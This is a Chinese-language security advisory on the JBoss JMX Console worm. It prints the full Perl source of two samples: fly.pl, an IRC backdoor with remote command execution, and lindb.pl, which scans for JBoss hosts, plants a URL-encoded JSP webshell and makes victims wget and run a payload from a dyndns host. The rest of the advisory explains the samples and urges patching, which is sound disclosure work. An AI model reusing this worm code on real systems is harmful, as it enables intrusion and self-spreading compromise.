JBOSS WORM 蠕虫活动预警
近日知道创宇数据中心检测到JBOSS WORM蠕虫利用" JBoss, JMX Console,default security misconfigured Attack"攻击呈现上升趋势,受影响网站的数量不断增加,其中不乏国家部门、知名企业网站:
据知道创宇安全研究团队介绍:"JBoss, JMX Console,default security misconfigured Attack"是JBOSS 2010年爆出的安全漏洞,攻击者利用该漏洞可以上传webshell执行系统命令。"JBoss, JMX Console,default security misconfigured Attack"制作的蠕虫感染JBOSS主机后会自动扫描其他易受攻击的JBOSS主机,并在受感染主机上安置一个远程控制后门客户端和一个jsp文件的webshell。
蠕虫代码分析:
fly.pl
use IO::Socket::INET;
my $processo = "/usr/local/apache/bin/httpds";
my $pid=fork;
exit if $pid;
$0="$processo"." "x16;
my @sops =("localhost","jboss.dyndns.biz","webstats.twilightparadox.com","weztatso.dyndns-remote.com","jasuyeifd.dyndns.info","chillbill.twilightparadox.com","cents.dyndns-web.com","its".time()."s.dyndns.info",);
my $port=2020*4;
my $chan="#jb";
my $boxing =uname -a
;
$user =whoami
;
$boxing =~ s/\r//g;
$boxing =~ s/\n//g;
$boxing =~ s/ //g;
$boxing =~ s/\s//g;
$user =~ s/\r//g;
$user =~ s/\n//g;
$user =~ s/ //g;
$user =~ s/\s//g;
while(1) {
my $nick="fly[".int(rand(999999999))."]";
retry: close($sk);
my $server = "";
while(length($server)<10) {
$server = $sops[int(rand(9))];
}
sleep(3);
my $sk = IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>$port,Proto=>"tcp") or goto retry;
$sk->autoflush(1);
print $sk "POST /index.php HTTP/1.1\r\nHost: $server:$port\r\nUser-Agent: Mozilla/5.0\r\nContent-Length: 385256291721361\r\n\r\nfile1=MZ%90%0a%0d\r\n";
print $sk "NICK $nick\r\n";
print $sk "USER ".$user." 8 * : ".$user."\r\n";
while($line = <$sk>) {
$line =~ s/\r\n$//;
if ($line=~ /^PING \:(.*)/) {
print $sk "PONG :$1\r\n";
}
if($line =~ /welcome\sto/i) {
sleep(2); print $sk "JOIN $chan\r\n";
sleep(1);
print $sk "PRIVMSG $chan :UserName=$boxing\r\n";
}
if ($line =~ /PRIVMSG (.*) :.rsh\s"(.*)"/) {
$owner=$line;
$de=$2;
if($owner=~/iseee/gi) {
@shell=$de
;
foreach $line (@shell) {
sendsk($sk, "PRIVMSG iseee :$line\r\n");
sleep(1);
}
}
}
if ($line=~ /PRIVMSG (.*) :.get\s"(.*)"\s"(.*)"/) {
$owner=$line;
$url=$2;
$mult=$3;
if($owner=~/iseee/gi) {
$url=~/http:\/\/(.*)\/(.*)/g;
for($xz=0;$xz<=$mult;$xz++) {
system("curl ".$url.">/dev/null&");
curl "$url">/dev/null&
;
system("wget ".$url.">/dev/null&");
wget "$url">/dev/null&
;
system("wget $url>/dev/null&");
}
sendsk($sk, "PRIVMSG iseee :Got $host/$path - $mult times\r\n");
}
}
if ($line=~ /PRIVMSG (.*) :.post\s"(.*)"\s"(.*)"/) {
$owner=$line;
$url=$2;
$ddata=$3;
if($owner=~/iseee/gi) {
$url=~/http:\/\/(.*)\/(.*)/g;
$host=$1;
$path=$2;
my $sck=new IO::Socket::INET(PeerAddr=>$host, PeerPort=>80);
print $sck "POST /$path HTTP/1.0\r\n". "Host: $host\r\n". "Connection: close\r\n". "Content-Length: ".length($ddata)."\r\n\r\n".$ddata;
sleep(1);
close($sck);
sendsk($sk, "PRIVMSG (.*) : Posted $host/$path - $mult\r\n");
}
}
}
}
sub sendsk() {
if ($#_ == 1) {
my $sk = $_[0];
print $sk "$_[1]\n";
}
else
{
print $sk "$_[0]\n";
}
}
fly.pl是蠕虫的后门脚本,该脚本获取受害主机信息后传给指定的irc频道,接受控制,不过测试后发现几个截获蠕虫样本中的irc服务器已经down掉了。
lindb.pl
use IO::Socket;
my $mark=ps aux | grep /usr/local/jboss/bin/javahttpd | grep -v grep
;
$ii=whoami
;
if ($ii=~/root/g) {
system("sh treat.sh&");
}
if(length($mark)>260) {
die;
}
my $processo = "/usr/local/jboss/bin/javahttpd";
my $pid=fork;
exit if $pid;
$0="$processo"." "x16;
make lnx
;
system("make lnx");
system("perl fly.pl&");
$idssvc = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=idssvc.war&argType=java.lang.String&arg1=idssvc&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True HTTP/1.0\r\n\r\n";
while(1) {
$partx=int(rand(255));
$fl="/tmp/sess_0088025413980486928597bf$partx";
$party=int(rand(255));
$sudoku="./pnscan -r JBoss -w \"HEAD / HTTP/1.0\\r\\n\\r\\n\" -t 6500 $partx.$party.0.0/16 80 > $fl";
system($sudoku);
open FILE, "$fl" or die "I cannot live like this!\n";
my @target = <FILE>;
close(FILE);
foreach $possible (@target) {
$possible=~s/\)//;
$possible=~s/\(//;
$possible=~/(.*)\.(.*)\.(.*)\.(.*)\s\s(.*):\s(.*)80\s/g;
$it="$1.$2.$3.$4";
$it=~s/\s//g;
$it=~s/ //g;
$it=~s/\t//g;
my $crap = new IO::Socket::INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto np;
print $crap $idssvc;
$page = "";
$page .= $_ while <$crap>;
sleep(2);
if($page=~/200/||$page=~/500/) {
push(@target,$it);
}
np: close($crap);
}
foreach $it (@target) {
my $sck = new IO::Socket::INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;
print $sck "GET /idssvc/idssvc.jsp HTTP/1.0\r\nConnection: Close\r\n\r\n";
$page = "";
$page .= $_ while <$sck>;
if($page=~/comments/g) {
my $scka = new IO::Socket::INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;
print $scka "GET /idssvc/idssvc.jsp?comment=wget+http://webstats.dyndns.info/javadd.tar.gz HTTP/1.0\r\nConnection: Close\r\n\r\n";
sleep(4);
close($scka);
my $sckb = new IO::Socket::INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;
print $sckb "GET /idssvc/idssvc.jsp?comment=tar+xzvf+javadd.tar.gz HTTP/1.0\r\nConnection: Close\r\n\r\n";
sleep(3);
close($sckb);
my $sckd = new IO::Socket::INET(PeerAddr=>$it, PeerPort=>80, TimeOut=>120) or goto nta;
print $sckd "GET /idssvc/idssvc.jsp?comment=perl+lindb.pl HTTP/1.0\r\nConnection: Close\r\n\r\n";
sleep(2);
close($sck);
}
nta: close($sck);
}
}
lindb.pl是蠕虫感染的核心程序,脚本感染主机后通过下载远程蠕虫代码调用自身同时执行fly.pl脚本向远程控制端发回信息,随机扫描ip段发现其他安装有JBOSS的主机,继而对该主机进行攻击,攻击成功后继续新一轮感染。
受影响的JBOSS系统版本:
• JBoss Application Server (AS) 4.0.x
• JBoss Communications Platform 1.2
• JBoss Enterprise Application Platform (EAP) 4.2, 4.3, 5.0
• JBoss Enterprise Portal Platform (EPP) 4.3
• JBoss Enterprise Web Platform (EWP) 5.0
• JBoss SOA-Platform (SOA-P) 4.2, 4.3, 5.0
据知道创宇DC数据中心最新数据表明,虽然该漏洞早在2010年4月被发现,但是互联网上存有该漏洞的主机大部分到目前为止依然未修复该漏洞,得以使2010年10月出现JBOSS WORM继续活动。知道创宇数据中心数据还发现在最近检测到的蠕虫活动中,约10W JBOSS网站中感染此蠕虫的网站比重占到21%,可见JBOSS 蠕虫危害之大。
知道创宇作为处在国内web安全研究前沿的安全公司本着为广大网民、站长负责的态度积极响应预警处理互联网上各种安全危险,维护广大网民、站长的切身利益。到目前,知道创宇安全研究团队已经向受JBOSS WORM影响的若干政府企业网站发出预警信息并协助解决问题。同时知道创宇呼吁其他受此漏洞影响的JBOSS网站站长尽快升级到JBOSS最新版本修复该漏洞,从而维护广大网民利益并扼制JBOSS WORM的传播。